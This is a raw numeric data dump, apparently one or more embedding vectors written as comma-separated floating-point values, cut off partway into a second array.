-0.033855792,-0.023658842,-0.0063172723,-0.004422801,-0.014177741,0.008620755,-0.011236177,0.02455883,0.038878106,-0.0066802786,-0.011871179,0.030558726,-0.007156767,-0.008021627,-0.0029653404,-0.00085902394,-0.013865484,-0.0116695715,0.015641546,-0.036689375,-0.002175768,-0.008224548,-0.020069182,0.009915141,-0.040419824,0.006646706,0.0044312607,0.010863679,0.023729185,-0.012301077,-0.00971073,-0.0008562723,0.02044737,-0.003125685,0.006431306,0.0032613976,-0.0032336926,-0.0025825093,0.0013464441,-0.009978493,-0.0092416,0.0031916618,-0.013898318,-0.013020212,0.0044945735,-0.005589454,0.0067352694,0.0034461115,-0.01634719,0.02780828,0.0145628555,0.0015812714,0.011204606,-0.01971739,-0.036840722,-0.012325705,-0.006797794,-0.031835657,-0.012056273,0.008728904,0.019291796,-0.007920392,-0.0036914994,-0.011667014,-0.047259945,0.015591251,-0.01615634,-0.024025025,-0.0047709253,0.012157993,0.006080416,0.017277593,0.035558045,-0.012696118,0.004600237,0.0035308178,0.012992429,0.015681304,0.0067497115,-0.008127353,-0.008467344,0.0010829269,0.014497139,-0.013078249,-0.0106818415,0.004136311,0.019626176,0.00489284,0.022449167,0.003551871,-0.0075773117,-0.0039413422,-0.02585831,0.009303423,0.0048464993,0.031880625,0.008802672,-0.012421842,-0.020322323,-0.006665188,0.014247055,-0.0003496248,-0.0056923614,0.0122583695,0.0044670785,-0.02040144,-0.005314009,0.03875427,-0.0065016435,-0.025667662,0.00988883,0.0079578785,-0.0025845838,-0.0028839796,0.026581282,0.0045431587,0.002070145,0.021414945,-0.012221946,0.021252155,0.0015748553,-0.0033465691,0.020255292,0.0018101461,-0.004476809,-0.015091656,0.0172603,0.015349542,-0.025644887,0.0036039196,0.0039832476,0.028767133,-0.024253765,-0.008167032,-0.022311809,-0.00038986775,-0.016307369,-0.010700903,-0.030813683,0.006418972,0.003315729,-0.020207435,-0.0032614667,-0.015436807,-0.0011966351,0.02277965,-0.024412109,0.010465999,-0.03610824,-0.019134296,0.012140239,0.0018262351,-0.015009726,-0.0020729043,0.010610811,-0.005195555,-0.0059808497,0.021023013,0.0006391124,0.034828268,-0.003360654,-0.006875063,0.003708305,0.0028440887,0.032224726,-0.0055348803,-0.002908872,0.07325016,0.010374258,0.00081218104,0.008843698,0.020180387,0.024269897,0.024387114,-0.0072955308,0.0041595786,-0.018160347,0.026331441,0.020620145,0.0058753463,-0.0030115733,0.014954364,0.028873932,0.031953335,0.0053358027,-0.011151138,0.033239186,0.004166941,-0.0056829145,0.008860579,0.009214956,0.004060944,-0.0116625745,0.004197919,0.0021103239,0.0068837553,0.0017581854,-0.020943351,0.025459833,0.0017870986,-0.010572012,-0.020363111,0.00043353497,0.019983314,-0.0065277354,-0.0051469184,-0.015049125,0.014203405,0.0014803219,-0.024089633,0.0021013762,0.013039285,-0.008381577,0.011049843,0.016751166,0.004059771,0.008705071,-0.00631444,0.0013261031,-0.0017386774,0.0064212712,-0.010342725,-0.0017638224,0.01586154,-0.016315978,-0.027348086,-0.000711244,0.021823708,-0.026036434,0.007740768,0.0030542817,0.0066038007,-0.01708911,-0.010686367,-0.003567098,-0.008221379,-0.002977836,0.040270567,0.0009037696,-0.012670269,0.018034283,0.010041887,0.0042914767,0.0076677273,-0.006435403,0.03283969,0.012058618,-0.0070342803,-0.0010772797,-0.015779601,-0.014066317,-0.02432509,-0.015961995,-0.024970206,-0.011249319,-0.010041201,0.0048557813,-0.0066191726,-0.019060792,0.04372493,-0.0046996116,0.022377966,0.010992834,-0.007887806,-0.00883754,0.0155394,0.013879812,0.013417988,-0.023266453,0.03731817,0.02706132,-0.044839624,-0.001961449,-0.009656471,0.0041327714,-0.019726237,0.013717735,-0.014125587,-0.009832427,-0.009385792,-0.0051561263,-0.0053510363,0.020007348,-0.006677978,0.0035052279,0.03502201,0.020960009,0.006883917,0.0053882515,-0.014972737,0.016781138,0.018209945,0.00085574493,-0.025281733,0.022330157,-0.005967909,0.0065529584,0.021851256,-0.02826081,-0.011181964,-0.0024446133,0.005681243,-0.037134383,-0.013058795,0.0041880338,0.00831387,0.015997471,-0.019557057,-0.021307198,0.032605715,-0.004299969,0.006409956,0.007287139,0.019286117,-0.011759904,0.006972783,0.025987823,0.02503537,-0.0067687286,0.014185819,-0.016490022,-0.0043683085,-0.015418037,-0.001377116,-0.02243008,0.0017084654,-0.012513294,-0.0096464185,-0.0039286576,0.0028901913,-0.0035278203,0.0069541764,0.020169957,0.0029148222,-0.0034783706,0.0048923916,0.0035272231,0.004663844,0.011695064,0.0047979327,-0.012719899,0.0019466025,0.009231187,0.01828986,-0.00035977497,0.009854847,0.0028268648,-0.037216507,0.013671277,0.01874144,0.010531837,-0.0220741,0.010843543,0.009104653,-0.016086154,-0.018692885,0.018861119,-0.008059125,0.0023149292,0.011663029,-0.024114663,-0.020259926,0.017315917,-0.00016100614,0.06520856,-0.01623301,0.011388788,0.002078909,0.022760095,-0.024064178,-0.00024107653,-0.003380848,0.015600779,-0.011988725,-0.043483436,-0.029201824,-0.013266926,-0.005502399,0.006534562,-0.012491025,-0.0004987145,0.0036455367,0.0034249432,0.024501625,0.005269287,0.0075666523,-0.004542938,0.012475103,-0.0070604747,0.01968808,0.018290266,-0.018338555,0.0045236447,0.00645535,0.0031559009,-0.026089834,0.0009321943,0.02666681,-0.011191207,0.0055417283,0.006775034,0.007989862,-0.025324777,0.005373339,0.015679952,-0.0021886774,0.037861396,0.0018543471,0.022949234,-0.015601804,0.007784822,-0.01738265,0.0026027914,-0.018725181,0.005284709,-0.015487147,-0.011469056,0.008231445,-0.015168568,0.012030689,0.007452968,0.0208006,0.01025461,-0.009420823,-0.00046041902,0.00012280492,0.0104231145,-0.0066838483,-0.009518197,0.015017022,0.019867321,-0.01470564,0.015725946,-0.024318554,0.020634877,0.0058441423,0.010576592,0.008449941,-0.01433117,0.0015342553,0.011017704,-0.02040479,-0.013632882,-0.028782446,-0.011132618,-0.008740689,0.030019328,0.018370364,-0.011768791,0.00647959,-0.013332446,0.0030140271,0.07847567,0.027374191,0.020794904,0.01688417,0.0028994214,0.00829878,0.016468065,0.016413888,-0.009161387,0.009197084,-0.016376441,0.022445874,0.0018375631,0.0031730456,0.010687036,-0.0068121855,-0.011234111,0.0058280565,0.00041768965,-0.012179575,0.00074397033,0.02733266,0.02731149,0.016092656,0.0049696323,0.0064370586,0.017276047,-0.010024769,0.009719208,-0.0030474868,-0.0072733043,-0.011682953,0.013263672,-0.023075363,-0.0037675118,-0.04311738,0.0023040227,0.11683505,-0.0055883043,-0.0016818208,0.017600209,-0.020222615,0.0063588503,-0.12290281,0.019182146,0.006947932,0.01652078,-0.008839104,-0.020534249,-0.0051141833,0.024833139,-0.0019373427,-0.0029844574,-0.020671742,-0.022997182,0.027753895,-0.01935211,-0.004671011,0.007375334,-0.0006057833,0.0003089541,-0.022126758,-0.012402708,0.0063525643,-0.011052633,-0.018948067,-0.016737232,0.013170234,-0.0034633055,0.014687142,-0.026825657,-0.02417868,0.017113034,0.017956508,-0.009467758,-0.014771551,-0.01829383,0.01653794,0.025309263,-0.018666971,-0.048047148,-0.16208443,0.014606108,-0.002390448,-0.031947475,0.023990968,-0.013682311,-0.003557395,-0.000028322307,0.036614608,0.009906215,-0.014900304,0.0190107,0.0005091423,0.01670833,-0.023431318,-0.00037103952,0.0035241263,-0.00038654846,0.008793618,0.009810475,0.013709731,0.0011687351,-0.015929634,-0.021847226,-0.015593918,0.002643654,0.006534659,0.035383053,0.0038760402,-0.004286912,-0.008416138,-0.00039913226,-0.022917476,0.011938135,-0.015940264,-0.007828608,-0.008454894,-0.0072714314,-0.01677836,0.018643381,-0.0004603372,-0.012316365,-0.006970245,-0.0014512608,0.0019638897,0.027440187,-0.0039989646,0.01615876,0.009670822,0.0090675885,0.014646397,-0.003573385,-0.015995204,0.019305108,0.0055116406,0.0024253156,-0.0025467805,-0.025657743,-0.011547808,0.009051691,0.0077286456,-0.015792897,-0.01099621,-0.013578916,0.018377898,0.0003599221,0.001878304,-0.019177094,-0.0044027506,0.018242538,-0.011820898,0.0051869494,-0.0085524125,-0.022248497,0.014198813,0.013848609,0.0033760935,-0.0027956131,0.019361375,-0.019518599,-0.009815657,-0.01660974,0.014666938,-0.0391932,0.010266215,-0.013625052,0.0032849165,0.0019156042,-0.008564557,-0.015682261,0.026123354,-0.011819038,0.0076384223,-0.020574661,0.03290573,0.0020275936,0.023007212,0.00042709624,-0.02651907,0.01072786,0.014924993,-0.023959888,-0.014926732,-0.008851805,-0.010734996,0.010268573,-0.015997494,-0.022610065,-0.018256279,0.01427086,-0.014005772,-0.012179201,0.024652282,-0.0050225523,-0.03173549,-0.013286448,0.0056521106,-0.0017571066,0.01011096,-0.007800691,-0.033142243,0.00987672,-0.0115815215,0.018323515,0.046506315,0.019392213,-0.041593254,-0.014631822,0.006466842,0.0026754886,-0.03474808,0.0137996655,-0.0016102039,-0.004751042,-0.010899978,0.001386046,-0.016887765,0.0065344297,-0.024956707,0.0058635264,0.0135781495,0.00495731,-0.003703493,-0.009755396,0.0016231627,-0.02837619,0.0326442,-0.023103934,0.016290162,0.005040503,-0.00058940914,0.02954613,-0.026743164,-0.010560086,0.022978485,0.055410754,-0.004197082,-0.022668766,0.002249088,-0.0005717355,0.013757916,0.014142033,-0.009290375,-0.0050770277,-0.0058048386,-0.031339843,0.004497795,0.0033192106,-0.0027578515,-0.012429232,0.021439929,0.005397687,0.026478378,-0.00190694,0.011221503,0.016502028,-0.016933283,-0.007881745,0.02469422,0.032610543,-0.009076242,0.008822703,0.008957735,-0.005052819,-0.016854255,-0.019971797,-0.02730989,0.00038550122,0.006906266,-0.0014187067,-0.023775663,-0.028104348,0.0001743616,-0.007138566,-0.01814941,0.0026133244,0.020437406,0.009019693,-0.018524792,0.018373542,-0.012606616,-0.017009065,-0.0054340535,0.017647434,-0.0063058855,0.0025608,0.017839447,-0.01932948,-0.008061117,0.008638392,-0.016148144,-0.0056473026,-0.008482183,-0.014148187,-0.0098138135,0.018448422,-0.0052827992,-0.023207348,-0.0045746234,-0.017227234,-0.0024363936,-0.0043387357,-0.008371985,0.0073235985,0.008627208,-0.008833777,0.0032104116,-0.034048304,0.0022200712,0.00268988,-0.01247004,-0.010209284,-0.01845869,-0.0066028917,0.02460636,0.019970845,0.03226942,-0.011402187,-0.002318679,-0.02400331,-0.030895421,-0.005378708,0.05229015,-0.011851408,-0.012749294,0.02835596,0.00764307,0.021496007,-0.0058185975,0.00911604,0.020621592,0.013170061,0.009568688,0.00664536,-0.006076601,0.013099244,0.0046278294,0.0017706896,0.005763207,-0.021581931,-0.027707249,0.013431135,0.019481596,0.019806055,-0.0128507735,-0.004105246,-0.009161957,0.004863499,-0.033825573,0.007308281,0.04105266,-0.006622922,0.016700359,0.036725957,-0.0061690086,-0.033197552,0.026542058,0.00744075,-0.036201984,0.004446643,-0.03652898,0.023018189,0.0030128371,-0.010200328,0.016382745,0.006778384,0.023461493,0.0071595376,0.004674431,-0.006416433,-0.0041019428,0.02187877,0.012001257,0.014492052,0.0137352785,-0.036652986,-0.0038427643,-0.0057051317,0.004442218,-0.021736827,-0.0064255595,0.0048514516,0.008385602,-0.02268468,0.004500238,-0.026813814,0.04479516,-0.0020039156,0.010230698,0.0056429096,0.012242715,-0.0105577605,-0.016137032,-0.01751313,-0.012108199,-0.0032209205,0.039217167,-0.01603416,-0.011347792,-0.024529386,0.021701297,0.041484233,-0.0054810965,0.035540935,0.0010278847,0.007116632,-0.012566037,0.012638355,0.0068246895,0.0019056771,-0.013095743,-0.0040111984,0.017372834,-0.0076709087,-0.014474019,0.009149486,0.02070913,0.00053297746,0.006923905,-0.00019085244,0.005059136,0.0099034235,0.02601508,-0.0040129647,0.010924203,-0.0051624426,-0.00065081345,-0.0069701686,-0.013771993,-0.01771472,-0.013822162,0.010105494,-0.018527668,0.0013038353,0.01523232,0.010376034,0.018134072,-0.019079253,-0.025979351,0.010460559,-0.013102788,-0.014379702,-0.016153408,0.010898125,-0.002112454,-0.007357957,0.0067815627,-0.006111826,0.023460574,0.009938591,-0.0017092874,-0.0013554282,0.020292003,-0.0133146895,-0.039395258,0.013671145,-0.0013577475,-0.0018251314,-0.0033816537,0.008534735,0.000629247,-0.023959117,0.052090306,-0.030394172,0.004604573,-0.0046260944,0.03403451,0.01814491,-0.02282473,0.009506959,-0.0037778271,-0.021610005,0.001543503,-0.035081793,0.0037850006,-0.0045092255,-0.03927814,-0.018137576,0.0024827633,-0.009983927,-0.013050939,-0.008933343,0.009714536,-0.008673088,0.035673432,-0.00074594014,-0.016357241,-0.0602763,-0.008813722,0.009372179,-0.013927342,0.023411635,0.017359417,-0.02643058,-0.020671278,0.0002629622,-0.022725817,-0.011418861,-0.0017013416,0.0038802854,0.020897891,0.0029221377,0.035431683,0.001842312,-0.0020764656,-0.0051071295,-0.0023312853,-0.023647888,-0.0139914295,0.000016170192,0.00089157384,0.0043907333,-0.004985378,0.00019038009,0.028646039,0.014847202,-0.012326148,0.004174482,0.009475574,0.008347896,-0.0018900419,0.006705126,0.008530971,-0.01541824,-0.02097388,-0.016094448,0.012148274,0.007904285,-0.026729446,-0.018742766,-0.003376466,-0.018016128,-0.009450224,0.012981607,0.005233764,0.02725738,-0.009781671,-0.006392464,0.0059044403,0.0007508502,-0.001032511,0.007073897,-0.020027181,0.01319436,-0.00810812,-0.019051582,0.014707369,0.02269803,-0.0025386885,0.011724747,-0.013713542,0.018451462,0.053510882,-0.011936126,0.0071611474,-0.010291274,0.00725109,-0.0020769336,-0.005683753,-0.02934574,0.0076412624,-0.017907768,-0.017392628,-0.016750026,-0.0073064617,-0.0077207275,-0.022077559,-0.00873717,-0.09352798,0.015608133,-0.019650647,-0.016248293,-0.022739705,-0.017561154,0.008867024,0.01146968,0.007387188,-0.033575248,-0.0022212637,0.018423233,0.003969068,0.0040566986,-0.011709414,0.011391639,-0.016035324,-0.01599604,-0.014158263,0.016329402,0.01695621,-0.025360266,-0.000877331,0.0020251558,0.018825721,-0.0043965974,0.006896019,0.015104276,0.015011385,0.0016471372,-0.0008118092,-0.0031048786,0.01681888,0.016054906,-0.00064275274,-0.009567329,-0.0010535776,0.008513769,-0.0047851424,-0.0022294503,-0.0021960938,-0.010779523,-0.0069352733,-0.001122194,-0.0046907295,0.0022608398,0.013217547,0.028554285,0.0060254657,0.023794876,-0.01813429,0.0040075886,0.0078088786,-0.010227709,-0.00013571068,-0.022571394,-0.002172959,0.0042787436,-0.000913967,0.0034222323,0.0001949546,-0.008307598,0.0073481803,-0.018647082,0.006512695,0.013536033,-0.002013259,0.00026309915,-0.033860195,0.013193653,0.003291454,0.007117223,-0.005663718,0.0026427577,-0.017334506,0.0055297147,0.010496791,-0.010042974,-0.004362647,0.021968044,-0.034871392,-0.0057329494,-0.00043201054,0.03355981,-0.011690564,-0.016541008,0.0011947363,0.0077567617,-0.031087473,0.014491849,-0.004010735,-0.0093574,-0.005972015,-0.018425493,0.0005299262,0.006197699,-0.010204538,0.017062059,-0.0007369198,-0.00027522197,-0.011661637,-0.001242042,-0.005484654,-0.02159627,-0.10132055,-0.018151812,0.02441367,-0.027112974,-0.005309866,-0.0124758445,0.034160834,0.018833976,0.046383146,0.014438791,-0.010301899,0.007402595,-0.01988232,0.005160996,0.012720719,0.006210204,-0.034086753,0.0009424604,-0.0039267675,-0.007683114,0.0072982665,-0.017162496,0.010924177,0.012674183,0.0054010362,0.020125061,0.0040088934,0.030326532,0.00740287,-0.00080302224,-0.006578911,0.013495095,-0.007952404,0.0023565467,-0.018863652,-0.015986944,0.0022902412,0.006232881,-0.0072049615,0.03566337,0.002315687,-0.0057844017,0.024687285,0.02054339,0.0072326106,0.0032090226,-0.009658774,0.020335155,0.01016016,-0.007568037,-0.0017074067,0.007084185,-0.0015873088,-0.015248403,-0.0073661064,-0.0052687027,-0.005021835,-0.0011908053,0.024099031,-0.0032844113,-0.00029490003,0.010151976,-0.025054822,0.022155916,-0.0039471453,0.0056729205,-0.02092261,0.014452445,-0.00332099,0.0137690455,-0.001969095,0.033121563,0.0063563758,-0.014666926,0.027359799,0.021607785,0.009939759,0.022502257,0.026566837,0.00502141,0.015516876,-0.03827657,-0.0012750381,0.0025590209,-0.031091396,0.01874372,-0.0005380165,-0.002405255,-0.025725562,0.0055800877,0.0069403583,0.016803097,-0.00416262,0.022786887,0.017645292,0.006430157,0.060072605,-0.009695579,-0.027726866,0.0011342,-0.00687183,-0.001322826,-0.007179796,-0.0047653015,-0.034271188,0.01983976,0.028345661,0.020450495,-0.0007376469,0.0040845466,0.014068364,0.021831525,-0.020695234,0.014232943,0.022940787,0.0137255015,-0.0025974181,0.002333056,-0.015921816,0.00020042378,0.011403466,-0.009421309,-0.00011140996,-0.010607894,0.0073448815,-0.03350184,-0.021808194,0.011940477,0.0077757738,-0.03494635,0.0033504223,0.006572239,0.012402376,-0.0019742579,-0.0043038055,0.0132244285,-0.004078074,0.009658093,0.0041443394,0.0005204059,0.01480199,0.006476854,-0.008294067,0.001122445,0.017394317,0.0119021125,-0.028629161,-0.006707068,-0.02131675,0.015947595,-0.0061854413,-0.021467995,0.023753867,0.016579704,0.004841227,0.002151098,-0.01534318,-0.015807644,-0.0009398072,0.031456698,0.008406836,0.020605894,0.019472752,-0.0057094563,0.00080183084,-0.018601887,0.0034399705,-0.00396141,-0.002238185,0.012177975,-0.002851973,-0.00024740104,0.016899558,-0.06594137,0.028987775,0.01645507,0.017341867,0.013356392,0.025165427,0.014630013,-0.01268473,0.00008482881,-0.008042813,-0.012899471,0.01817125,0.0174949,0.0099382205,0.004096712,-0.0035833938,-0.007381416,0.047288474,0.013014948,-0.009165301,-0.020384695,0.012150609,-0.0059564495,-0.00011768849,0.041418463,0.0061107622,-0.002329174,-0.02284595,0.0038468745,0.00838203,-0.024313625,0.017823214,0.011074827,0.0011422145,0.03104395,0.026609316,-0.0049022585,-0.024456203,0.011090784,-0.019234063,-0.005027682,0.02172766,0.038073655,-0.0077758697,-0.028827468,0.008606274,0.008244594,-0.0148313055,-0.021177312,0.0118048135,-0.0084553845,-0.010756911,0.028912516,0.012235355,0.023539025,-0.022304794,-0.017755222,-0.015152794,0.007628749,-0.014268047,0.004757948,0.0018872529,0.006091347,0.014160371,0.017660491,-0.0040064845,-0.00023351038,0.019032033,0.0009606826,0.031345334,0.023448061,0.020245835,0.0072945696,0.0028088826,-0.0025138892,0.019637095,0.026353998,0.0042946204,-0.0075247395,-0.008783854,-0.013624347,-0.0062642046,0.0061630034,0.004265125,0.017555393,0.011152432,0.0011508939,-0.0009872187,-0.0024787085,-0.02043928,-0.013195378,0.0011632012,-0.0052831555,0.00019289643,-0.020927409,-0.008035727,0.0036859799,0.02825886,0.007903773,-0.004535664,0.025885606,0.005184393,-0.01197463,0.020888932,-0.009413647,0.008879208,-0.0017316637,0.0022392313,-0.0034663605,-0.0031070055,0.02931605,0.0018080057,0.016887816,0.012472392,0.008996031,-0.022142718,-0.009667893,0.00126453,-0.0010650397,0.009297132,0.0029358163,0.00090428034,0.010351663,0.007262487,-0.00708405,0.007961871,0.017714603,0.017610814,-0.011578576,0.0024846483,-0.017193677,0.0067150537,-0.0053464053,0.000764404,0.0118801035,0.0094934935,-0.016150119,-0.015780473,0.004165945,-0.0032849207,0.014083462,0.009324259,0.00006678976,0.003672216,0.0107024815,-0.042253677,-0.025964528,-0.01459123,-0.0036375504,0.016538033,-0.00870212,-0.0072909785,0.025588408,0.0040473463,0.048479255,-0.008007681,-0.014714699,0.020823114,-0.013004812,-0.0047076615,-0.014442197,0.023816025,-0.017910356,0.012510042,0.031823266,-0.019282522,0.017376032,0.00009102181,0.0011414896,0.005346654,0.007888222,0.023501335,0.02266986,-0.0075154123,-0.012496028,-0.003586466,0.014522153,0.0033424855,-0.0032552779,0.011820197,-0.001223101,-0.022170711,0.027834903,-0.020551976,-0.007280624,0.016363252,0.007940222,-0.016502347,0.001893936,0.008528843,-0.018493589,0.005630106,-0.0045844354,-0.0027788386,0.014918384,-0.02172105,0.004037387,-0.010111723,0.016261732,-0.030721473,-0.036603067,0.0018564607,-0.10343431,-0.0041531334,0.008008712,0.014336871,0.0539311,0.0015912234,-0.0037354492,-0.011351018,-0.007345983,-0.0010650927,-0.0031599903,-0.012443538,-0.01921241,0.0055555985,0.038840685,-0.007109804,-0.0035586515,0.010585281,-0.0017904234,-0.0058170594,0.021747278,0.0030309411,-0.017042957,0.019975252,0.017325193,0.0038994225,-0.0047920453,-0.008350581,0.010281277,-0.0012683509,-0.023307892,-0.011316219,0.009096139,0.002198827,-0.008438026,-0.0013233932,0.00052318384,0.01167115,-0.046920873,-0.029508045,0.0019045832,-0.00049344153,0.0046050623,0.002315311,-0.012716321,0.012651715,-0.022878656,0.0064820675,-0.00012585036,0.01302014,-0.0037186712,0.015395022,0.0035011375,0.03850626,-0.014075686,0.009795272,-0.0061395545,-0.019051906,0.030128175,0.0017884698,-0.009860004,0.008604521,0.0051158555,-0.00042513586,-0.006590223,0.0035538394,-0.00451324,0.015998151,-0.0053233644,0.003468597,0.008754442,-0.04436702,-0.018386843,-0.017974745,0.0020305503,0.0028871798,0.0017579882,-0.007033121,-0.00310304,0.0017998437,0.036358573,-0.002000724,0.03167912,0.000954208,0.025871703,0.0041255234,0.0003671748,0.005749858,0.03484546,0.0064714905,-0.020737454,-0.0020440742,0.037559085,0.0040638456,0.013837486,0.005690056,0.0034508386,0.011378716,-0.012360063,0.0074590226,-0.0027438547,-0.0042380886,-0.004798154,-0.00028543922,-0.02926481,0.023552667,-0.0004123625,-0.019088196,-0.010908377,-0.029389849,-0.011097999,0.041068163,0.008357966,0.04945253,0.019314637,0.009357858,-0.0062758843,0.010220459,-0.010491138,-0.029392326,-0.020266881,0.0020659599,-0.006206481,0.0145020075,0.019164165,-0.0037581336,0.01823168,-0.013271778,-0.024491072,0.009660425,0.013286758,0.007379684,0.016578067,0.0073316977,-0.009254567,0.011475045,0.0036480755,0.017602578,0.000014916818,0.018704934,0.009144747,-0.016941965,-0.004345,0.0035563696,-0.02364809,0.024094643,-0.02003128,0.008972844,-0.0033606237,-0.017746704,0.0039044144,-0.0000122865085,0.001844061,0.009413271,-0.012749669,-0.007959545,-0.004201233,-0.006959706,-0.023758842,-0.0016858042,-0.011619345,-0.010190291,-0.0025337434,-0.006715015,-0.026377091,0.013594607,0.008024258,-0.0019184999,-0.015398328,0.0083720125,0.004946621,-0.019382931,-0.0026956166,-0.0011931813,-0.029531466,-0.007516585,0.024725415,0.012923969,0.00051706564,-0.007475177,-0.019852232,0.005454852,0.0001301601,-0.027887177,0.0035697734,-0.01336286,0.0032926477,-0.0056769103,0.018612316,0.0006317456,-0.0023427643,-0.018555392,0.0034260927,-0.010094541,-0.011189425,-0.030538907,0.0032281845,-0.011893166,-0.01533015,0.006020203,0.0103956,0.008353403,-0.015750676,0.011739138,0.05239218,0.01158564,-0.0053487695,0.010280779,0.0022268894,0.005958189,-0.00015155673,-0.0035881272,0.027502207,0.12629436,0.009177103,0.0060516223,-0.008286563,0.009837266,0.0019846903,-0.0040519857,-0.0034805085,-0.0032303098,0.004021989,0.013748217,-0.016478688,0.0024880636,0.006857942,-0.017829554,0.034550104,0.017838253,-0.026698746,0.014303251,0.005069064,0.0067419563,-0.027540801,0.004641388,-0.049661487,-0.015870405,-0.0652131,0.031049848,0.03573647,-0.0013734889,0.030831616,0.010788088,0.0026746057,0.0020660898,0.015079371,-0.01605478,0.0061306697,0.02063571,-0.010532981,-0.0027050176,-0.003591226,0.019728148,0.0048971614,-0.0065341555,-0.00892364,-0.015673254,-0.018656071,0.0035868485,-0.0008845581,0.002696607,-0.004771627,-0.007008692,-0.014625829,-0.011709677,-0.00708134,-0.00564248,-0.006764439,-0.0010817375,0.0114901485,0.015329616,0.0056945574,0.010949757,0.010185685,0.006562119,0.010853708,-0.0052110003,-0.0019353147,-0.022002691,0.0027672087,0.0064093447,-0.009932553,0.022883348,-0.01580188,0.00027819574,-0.014526533,0.0062716645,-0.00001770889,-0.012857443,-0.016742606,0.016894069,0.009060973,0.004835515,-0.011204173,0.0016174838,0.012734566,0.0015236228,0.009818932,-0.018513428,0.0255841,-0.017496912,-0.0076183765,-0.010484552,0.03068272,0.01980666,0.018858612,-0.0076728463,0.009948353,0.021753848,-0.009125358,0.001548724,-0.0052593374,-0.020240575,-0.014745784,-0.005650085,0.015315254,-0.00076622143,0.0035162696,-0.010588221,0.00108823,-0.0075512324,-0.005141239,-0.009034237,0.02939075,0.0064178626,0.012123613,-0.005963121,0.04578909,-0.02521785,-0.017382812,0.008207116,-0.022594394,-0.011816157,0.018934315,0.005977698,0.03356492,0.011509777,0.009019636,-0.023210961,0.0025090044,-0.0001872935,-0.020023968,-0.0007379549,-0.029638505,0.010234252,0.026091034,-0.0032509267,0.0017853214,0.031891122,-0.0019382531,0.013084821,0.00082008797,-0.005966062,-0.02044103,0.0036599494,-0.005257554,0.019449035,-0.0086313905,0.033801366,-0.013562572,0.008444656,-0.007825761,0.003477468,0.023700591,-0.019213751,0.0023264925,0.0010254694,-0.013107226,0.012204929,0.009617787,0.0025294356,-0.023641493,0.012182181,-0.012984408,-0.003709604,-0.043788984,0.0409564,0.015137932,-0.0068502226,-0.00044488147,-0.0071742814,-0.0025837698,-0.022619648,0.0007417575,0.005525386,-0.007009472,-0.0039721574,0.014328948,0.011648416,0.016757268,-0.023975069,-0.003866667,0.026057849,0.002779966,-0.0050384323,-0.012972703,0.028920447,-0.0060188463,0.011667127,-0.010047635,-0.027013967,0.040572383,0.007467289,-0.011923701,0.0003343868,0.012348593,-0.025378298,0.01408113,-0.036253963,0.03241292,-0.03005926,-0.04597947,-0.0115313865,0.01349584,0.010832199,-0.019983258,0.0034724383,-0.012706307,0.008819988,-0.018277397,-0.001511413,-0.012273543,0.022767227,-0.0020473814,-0.0045169336,-0.030284666,0.0030985675,0.004155452,-0.013149913,-0.021947362,-0.005599537,-0.011843035,-0.009476352,0.0004422933,-0.0032493842,-0.014331715,-0.00054313435,-0.0039845128,0.0019670161,0.017634723,0.02139659,-0.033387426,-0.01944484,0.012954075,0.013331777,-0.0037532982,-0.00783083,0.0021802124,0.032714576,0.025660565,0.00037144273,0.0037520677,-0.0020064386,0.0043350547,0.02368617,0.012307533,-0.0098570725,0.00526026,-0.010726611,-0.031079225,-0.007440488,-0.014438616,-0.033079438,-0.0030898782,-0.019300634,-0.019316392,-0.019562041,-0.008985733,-0.028245427,0.013112633,0.0052923146,-0.008038288,0.011787848,0.009836445,-0.0023178859,0.015843391,-0.0054983553,-0.0013092649,0.014870711,-0.012916877,-0.00839102,0.0072793034,-0.011676767,0.0083986595,-0.0021977287,0.027561976,0.025386611,0.0030574466,-0.005532723,-0.023091055,-0.0074152225,-0.0057970122,0.0015762746,-0.017018298,-0.011346651,-0.023053365,-0.0054000155,-0.00054082973,-0.016090846,0.028022112,0.07276596,-0.062247,-0.012798207,0.00890442,0.011286685,-0.014573843,0.02467707,0.009155119,-0.031576853,-0.025347829,0.010772126,-0.006533179,-0.009793306,-0.03108576,-0.0016088866,0.011301216,-0.008516631,0.0015102758,-0.0047588134,-0.005014297,-0.0071830247,-0.006041968,-0.007148586,0.0010441737,-0.0020466659,-0.010811929,0.0022975726,-0.0063885916,0.013930051,0.0010057471,0.014178319,0.002061989,0.006974045,-0.016165007,0.008825698,0.01961831,-0.012879334,0.025447085,-0.0126041705,-0.026389906,-0.032889172,0.012192076,-0.0022771722,0.005601308,-0.0005855339,-0.010143678,-0.015457025,0.017513692,-0.0012441014,0.13827631,-0.007921823,-0.0023160207,0.017189756,0.00021444261,-0.014020307,0.0074467063,0.022465087,-0.00015645578,0.015885316,0.01647832,-0.00022166804,-0.01035728,0.028371802,-0.004073893,-0.010480495,0.018891064,0.13812421,-0.012610201,0.03518413,-0.0054163686,0.0019310963,0.0026550605,0.0006973475,0.01131855,-0.0717403,-0.0005037417,-0.044658348,-0.01831949,0.01875898,-0.016798977,0.014026355,-0.005273317,0.016733846,-0.0013056983,0.010330599,0.0029517915,0.016781094,-0.023956997,-0.016489264,0.0355475,0.0036695946,-0.008330326,-0.004243881,-0.017547753,0.014631268,-0.012452171,-0.00023284326,0.013594177,0.019391775,0.006045646,-0.009921915,0.017567728,0.0014332779,0.0033203962,0.006379657,0.013635187,0.0005124904,-0.021052135,0.007505468,0.0010220939,0.023274312,-0.0029798555,0.02005147,0.00542163,0.0018026528,-0.001352357,0.002174545,-0.003869493,0.016065279,0.025904622,0.024855249,-0.014273119,-0.0066350065,0.037532758,-0.0080151735,-0.00078155677,0.0050038025,0.010585387,-0.007024378,0.013594464,-0.00069458934,-0.013249137,0.005569687,0.019626444,0.0022479547,0.009881619,0.024990259,0.023916088,-0.014727984,0.0017228987,0.0061585354,0.001590686,0.014023697,0.012253364,0.020845661,0.015363417,-0.00030940754,0.009136454,-0.030518979,-0.015730249,0.015752489,0.005078598,-0.024480388,-0.009588852,0.012377717,-0.009289685,-0.032585613,0.013023348,0.00797187,0.0005578565,-0.01095344,-0.025840783,0.02149557,-0.01384908,-0.0074681155,-0.020579163,-0.00028142857,-0.033533417,0.00070816936,0.010271477,-0.005864744,-0.0021285145,0.008320063,-0.017160695,0.0039007803,0.0009688729,0.024047974,-0.000975906,-0.000086367385,-0.032001022,-0.008716973,-0.022449216,0.04559794,-0.0005320914,-0.019945376,0.03479992,-0.030113244,-0.015121667,-0.019819887,0.0054807765,0.013480985,0.0064508067,0.011214379,0.00061501045,0.011150887,-0.0010659093,0.00016143988],[-0.01989231,-0.00072138855,-0.008511383,-0.026601901,-0.0005628771,-0.03320003,-0.003505912,0.014573829,-0.015304715,-0.0045897085,-0.018991996,0.04480926,-0.019895023,-0.00